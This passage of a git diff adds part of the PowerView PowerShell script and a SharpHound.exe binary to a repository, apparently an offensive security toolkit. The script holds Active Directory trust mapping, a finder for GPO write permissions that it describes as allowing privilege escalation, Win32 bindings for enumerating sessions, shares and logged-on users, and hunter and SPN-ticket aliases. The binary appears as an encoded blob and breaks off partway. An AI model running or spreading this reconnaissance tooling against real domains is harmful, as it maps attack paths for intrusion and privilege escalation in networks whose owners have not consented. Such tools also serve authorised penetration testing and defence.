TrustRelationshipInformationCollection returned when using .NET methods. + +PowerView.DomainTrust.API + +Custom PSObject with translated domain API trust result fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DomainTrust.NET')] + [OutputType('PowerView.DomainTrust.LDAP')] + [OutputType('PowerView.DomainTrust.API')] + [CmdletBinding(DefaultParameterSetName = 'LDAP')] + Param( + [Parameter(ParameterSetName = 'API')] + [Switch] + $API, + + [Parameter(ParameterSetName = 'NET')] + [Switch] + $NET, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [Parameter(ParameterSetName = 'LDAP')] + [Parameter(ParameterSetName = 'API')] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Parameter(ParameterSetName = 'LDAP')] + [Switch] + $Tombstone, + + [Parameter(ParameterSetName = 'LDAP')] + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + # keep track of domains seen so we don't hit infinite recursion + $SeenDomains = @{} + + # our domain status tracker + $Domains = New-Object System.Collections.Stack + + $DomainTrustArguments = @{} + if ($PSBoundParameters['API']) { $DomainTrustArguments['API'] = $API } + if ($PSBoundParameters['NET']) { $DomainTrustArguments['NET'] = $NET } + if ($PSBoundParameters['LDAPFilter']) { $DomainTrustArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['Properties']) { $DomainTrustArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $DomainTrustArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $DomainTrustArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $DomainTrustArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $DomainTrustArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $DomainTrustArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $DomainTrustArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $DomainTrustArguments['Credential'] = $Credential } + + # get the current domain and push it onto the stack + if ($PSBoundParameters['Credential']) { + $CurrentDomain = (Get-Domain -Credential $Credential).Name + } + else { + $CurrentDomain = (Get-Domain).Name + } + $Domains.Push($CurrentDomain) + + while($Domains.Count -ne 0) { + + $Domain = $Domains.Pop() + + # if we haven't seen this domain before + if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) { + + Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'" + + # mark it as seen in our list + $Null = $SeenDomains.Add($Domain, '') + + try { + # get all the trusts for this domain + $DomainTrustArguments['Domain'] = $Domain + $Trusts = Get-DomainTrust @DomainTrustArguments + + if ($Trusts -isnot [System.Array]) { + $Trusts = @($Trusts) + } + + # get any forest trusts, if they exist + if ($PsCmdlet.ParameterSetName -eq 'NET') { + $ForestTrustArguments = @{} + if ($PSBoundParameters['Forest']) { $ForestTrustArguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $ForestTrustArguments['Credential'] = $Credential } + $Trusts += Get-ForestTrust @ForestTrustArguments + } + + if ($Trusts) { + if ($Trusts -isnot [System.Array]) { + $Trusts = @($Trusts) + } + + # enumerate each trust found + ForEach ($Trust in $Trusts) { + if ($Trust.SourceName -and $Trust.TargetName) { + # make sure we process the target + $Null = $Domains.Push($Trust.TargetName) + $Trust + } + } + } + } + catch { + Write-Verbose "[Get-DomainTrustMapping] Error: $_" + } + } + } +} + + +function Get-GPODelegation { +<# +.SYNOPSIS + +Finds users with write permissions on GPO objects which may allow privilege escalation within the domain. + +Author: Itamar Mizrahi (@MrAnde7son) +License: BSD 3-Clause +Required Dependencies: None + +.PARAMETER GPOName + +The GPO display name to query for, wildcards accepted. + +.PARAMETER PageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.EXAMPLE + +Get-GPODelegation + +Returns all GPO delegations in current forest. + +.EXAMPLE + +Get-GPODelegation -GPOName + +Returns all GPO delegations on a given GPO. +#> + + [CmdletBinding()] + Param ( + [String] + $GPOName = '*', + + [ValidateRange(1,10000)] + [Int] + $PageSize = 200 + ) + + $Exclusions = @('SYSTEM','Domain Admins','Enterprise Admins') + + $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() + $DomainList = @($Forest.Domains) + $Domains = $DomainList | foreach { $_.GetDirectoryEntry() } + foreach ($Domain in $Domains) { + $Filter = "(&(objectCategory=groupPolicyContainer)(displayname=$GPOName))" + $Searcher = New-Object System.DirectoryServices.DirectorySearcher + $Searcher.SearchRoot = $Domain + $Searcher.Filter = $Filter + $Searcher.PageSize = $PageSize + $Searcher.SearchScope = "Subtree" + $listGPO = $Searcher.FindAll() + foreach ($gpo in $listGPO){ + $ACL = ([ADSI]$gpo.path).ObjectSecurity.Access | ? {$_.ActiveDirectoryRights -match "Write" -and $_.AccessControlType -eq "Allow" -and $Exclusions -notcontains $_.IdentityReference.toString().split("\")[1] -and $_.IdentityReference -ne "CREATOR OWNER"} + if ($ACL -ne $null){ + $GpoACL = New-Object psobject + $GpoACL | Add-Member Noteproperty 'ADSPath' $gpo.Properties.adspath + $GpoACL | Add-Member Noteproperty 'GPODisplayName' $gpo.Properties.displayname + $GpoACL | Add-Member Noteproperty 'IdentityReference' $ACL.IdentityReference + $GpoACL | Add-Member Noteproperty 'ActiveDirectoryRights' $ACL.ActiveDirectoryRights + $GpoACL + } + } + } +} + + +######################################################## +# +# Expose the Win32API functions and datastructures below +# using PSReflect. +# Warning: Once these are executed, they are baked in +# and can't be changed while the script is running! +# +######################################################## + +$Mod = New-InMemoryModule -ModuleName Win32 + +# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', Scope='Function', Target='psenum')] + +# used to parse the 'samAccountType' property for users/computers/groups +$SamAccountTypeEnum = psenum $Mod PowerView.SamAccountTypeEnum UInt32 @{ + DOMAIN_OBJECT = '0x00000000' + GROUP_OBJECT = '0x10000000' + NON_SECURITY_GROUP_OBJECT = '0x10000001' + ALIAS_OBJECT = '0x20000000' + NON_SECURITY_ALIAS_OBJECT = '0x20000001' + USER_OBJECT = '0x30000000' + MACHINE_ACCOUNT = '0x30000001' + TRUST_ACCOUNT = '0x30000002' + APP_BASIC_GROUP = '0x40000000' + APP_QUERY_GROUP = '0x40000001' + ACCOUNT_TYPE_MAX = '0x7fffffff' +} + +# used to parse the 'grouptype' property for groups +$GroupTypeEnum = psenum $Mod PowerView.GroupTypeEnum UInt32 @{ + CREATED_BY_SYSTEM = '0x00000001' + GLOBAL_SCOPE = '0x00000002' + DOMAIN_LOCAL_SCOPE = '0x00000004' + UNIVERSAL_SCOPE = '0x00000008' + APP_BASIC = '0x00000010' + APP_QUERY = '0x00000020' + SECURITY = '0x80000000' +} -Bitfield + +# used to parse the 'userAccountControl' property for users/groups +$UACEnum = psenum $Mod PowerView.UACEnum UInt32 @{ + SCRIPT = 1 + ACCOUNTDISABLE = 2 + HOMEDIR_REQUIRED = 8 + LOCKOUT = 16 + PASSWD_NOTREQD = 32 + PASSWD_CANT_CHANGE = 64 + ENCRYPTED_TEXT_PWD_ALLOWED = 128 + TEMP_DUPLICATE_ACCOUNT = 256 + NORMAL_ACCOUNT = 512 + INTERDOMAIN_TRUST_ACCOUNT = 2048 + WORKSTATION_TRUST_ACCOUNT = 4096 + SERVER_TRUST_ACCOUNT = 8192 + DONT_EXPIRE_PASSWORD = 65536 + MNS_LOGON_ACCOUNT = 131072 + SMARTCARD_REQUIRED = 262144 + TRUSTED_FOR_DELEGATION = 524288 + NOT_DELEGATED = 1048576 + USE_DES_KEY_ONLY = 2097152 + DONT_REQ_PREAUTH = 4194304 + PASSWORD_EXPIRED = 8388608 + TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216 + PARTIAL_SECRETS_ACCOUNT = 67108864 +} -Bitfield + +# enum used by $WTS_SESSION_INFO_1 below +$WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{ + Active = 0 + Connected = 1 + ConnectQuery = 2 + Shadow = 3 + Disconnected = 4 + Idle = 5 + Listen = 6 + Reset = 7 + Down = 8 + Init = 9 +} + +# the WTSEnumerateSessionsEx result structure +$WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{ + ExecEnvId = field 0 UInt32 + State = field 1 $WTSConnectState + SessionId = field 2 UInt32 + pSessionName = field 3 String -MarshalAs @('LPWStr') + pHostName = field 4 String -MarshalAs @('LPWStr') + pUserName = field 5 String -MarshalAs @('LPWStr') + pDomainName = field 6 String -MarshalAs @('LPWStr') + pFarmName = field 7 String -MarshalAs @('LPWStr') +} + +# the particular WTSQuerySessionInformation result structure +$WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{ + AddressFamily = field 0 UInt32 + Address = field 1 Byte[] -MarshalAs @('ByValArray', 20) +} + +# the NetShareEnum result structure +$SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{ + Name = field 0 String -MarshalAs @('LPWStr') + Type = field 1 UInt32 + Remark = field 2 String -MarshalAs @('LPWStr') +} + +# the NetWkstaUserEnum result structure +$WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{ + UserName = field 0 String -MarshalAs @('LPWStr') + LogonDomain = field 1 String -MarshalAs @('LPWStr') + AuthDomains = field 2 String -MarshalAs @('LPWStr') + LogonServer = field 3 String -MarshalAs @('LPWStr') +} + +# the NetSessionEnum result structure +$SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{ + CName = field 0 String -MarshalAs @('LPWStr') + UserName = field 1 String -MarshalAs @('LPWStr') + Time = field 2 UInt32 + IdleTime = field 3 UInt32 +} + +# enum used by $LOCALGROUP_MEMBERS_INFO_2 below +$SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{ + SidTypeUser = 1 + SidTypeGroup = 2 + SidTypeDomain = 3 + SidTypeAlias = 4 + SidTypeWellKnownGroup = 5 + SidTypeDeletedAccount = 6 + SidTypeInvalid = 7 + SidTypeUnknown = 8 + SidTypeComputer = 9 +} + +# the NetLocalGroupEnum result structure +$LOCALGROUP_INFO_1 = struct $Mod LOCALGROUP_INFO_1 @{ + lgrpi1_name = field 0 String -MarshalAs @('LPWStr') + lgrpi1_comment = field 1 String -MarshalAs @('LPWStr') +} + +# the NetLocalGroupGetMembers result structure +$LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{ + lgrmi2_sid = field 0 IntPtr + lgrmi2_sidusage = field 1 $SID_NAME_USE + lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr') +} + +# enums used in DS_DOMAIN_TRUSTS +$DsDomainFlag = psenum $Mod DsDomain.Flags UInt32 @{ + IN_FOREST = 1 + DIRECT_OUTBOUND = 2 + TREE_ROOT = 4 + PRIMARY = 8 + NATIVE_MODE = 16 + DIRECT_INBOUND = 32 +} -Bitfield +$DsDomainTrustType = psenum $Mod DsDomain.TrustType UInt32 @{ + DOWNLEVEL = 1 + UPLEVEL = 2 + MIT = 3 + DCE = 4 +} +$DsDomainTrustAttributes = psenum $Mod DsDomain.TrustAttributes UInt32 @{ + NON_TRANSITIVE = 1 + UPLEVEL_ONLY = 2 + FILTER_SIDS = 4 + FOREST_TRANSITIVE = 8 + CROSS_ORGANIZATION = 16 + WITHIN_FOREST = 32 + TREAT_AS_EXTERNAL = 64 +} + +# the DsEnumerateDomainTrusts result structure +$DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{ + NetbiosDomainName = field 0 String -MarshalAs @('LPWStr') + DnsDomainName = field 1 String -MarshalAs @('LPWStr') + Flags = field 2 $DsDomainFlag + ParentIndex = field 3 UInt32 + TrustType = field 4 $DsDomainTrustType + TrustAttributes = field 5 $DsDomainTrustAttributes + DomainSid = field 6 IntPtr + DomainGuid = field 7 Guid +} + +# used by WNetAddConnection2W +$NETRESOURCEW = struct $Mod NETRESOURCEW @{ + dwScope = field 0 UInt32 + dwType = field 1 UInt32 + dwDisplayType = field 2 UInt32 + dwUsage = field 3 UInt32 + lpLocalName = field 4 String -MarshalAs @('LPWStr') + lpRemoteName = field 5 String -MarshalAs @('LPWStr') + lpComment = field 6 String -MarshalAs @('LPWStr') + lpProvider = field 7 String -MarshalAs @('LPWStr') +} + +# all of the Win32 API functions we need +$FunctionDefinitions = @( + (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), + (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())), + (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())), + (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])), + (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), + (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError), + (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])), + (func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError), + (func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError), + (func advapi32 RevertToSelf ([Bool]) @() -SetLastError), + (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])), + (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), + (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), + (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])), + (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])), + (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])), + (func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])), + (func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])), + (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError) +) + +$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' +$Netapi32 = $Types['netapi32'] +$Advapi32 = $Types['advapi32'] +$Wtsapi32 = $Types['wtsapi32'] +$Mpr = $Types['Mpr'] +$Kernel32 = $Types['kernel32'] + +Set-Alias Get-IPAddress Resolve-IPAddress +Set-Alias Convert-NameToSid ConvertTo-SID +Set-Alias Convert-SidToName ConvertFrom-SID +Set-Alias Request-SPNTicket Get-DomainSPNTicket +Set-Alias Get-DNSZone Get-DomainDNSZone +Set-Alias Get-DNSRecord Get-DomainDNSRecord +Set-Alias Get-NetDomain Get-Domain +Set-Alias Get-NetDomainController Get-DomainController +Set-Alias Get-NetForest Get-Forest +Set-Alias Get-NetForestDomain Get-ForestDomain +Set-Alias Get-NetForestCatalog Get-ForestGlobalCatalog +Set-Alias Get-NetUser Get-DomainUser +Set-Alias Get-UserEvent Get-DomainUserEvent +Set-Alias Get-NetComputer Get-DomainComputer +Set-Alias Get-ADObject Get-DomainObject +Set-Alias Set-ADObject Set-DomainObject +Set-Alias Get-ObjectAcl Get-DomainObjectAcl +Set-Alias Add-ObjectAcl Add-DomainObjectAcl +Set-Alias Invoke-ACLScanner Find-InterestingDomainAcl +Set-Alias Get-GUIDMap Get-DomainGUIDMap +Set-Alias Get-NetOU Get-DomainOU +Set-Alias Get-NetSite Get-DomainSite +Set-Alias Get-NetSubnet Get-DomainSubnet +Set-Alias Get-NetGroup Get-DomainGroup +Set-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup +Set-Alias Get-NetGroupMember Get-DomainGroupMember +Set-Alias Get-NetFileServer Get-DomainFileServer +Set-Alias Get-DFSshare Get-DomainDFSShare +Set-Alias Get-NetGPO Get-DomainGPO +Set-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup +Set-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping +Set-Alias Find-GPOComputerAdmin Get-DomainGPOComputerLocalGroupMapping +Set-Alias Get-LoggedOnLocal Get-RegLoggedOn +Set-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess +Set-Alias Get-SiteName Get-NetComputerSiteName +Set-Alias Get-Proxy Get-WMIRegProxy +Set-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn +Set-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection +Set-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive +Set-Alias Get-NetProcess Get-WMIProcess +Set-Alias Invoke-ThreadedFunction New-ThreadedFunction +Set-Alias Invoke-UserHunter Find-DomainUserLocation +Set-Alias Invoke-ProcessHunter Find-DomainProcess +Set-Alias Invoke-EventHunter Find-DomainUserEvent +Set-Alias Invoke-ShareFinder Find-DomainShare +Set-Alias Invoke-FileFinder Find-InterestingDomainShareFile +Set-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember +Set-Alias Get-NetDomainTrust Get-DomainTrust +Set-Alias Get-NetForestTrust Get-ForestTrust +Set-Alias Find-ForeignUser Get-DomainForeignUser +Set-Alias Find-ForeignGroup Get-DomainForeignGroupMember +Set-Alias Invoke-MapDomainTrust Get-DomainTrustMapping +Set-Alias Get-DomainPolicy Get-DomainPolicyData diff --git a/win/SharpHound.exe b/win/SharpHound.exe new file mode 100644 index 0000000000000000000000000000000000000000..78e97429589d5b8c7df90f23df11d8eae5fbbd74 GIT binary patch literal 832512 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 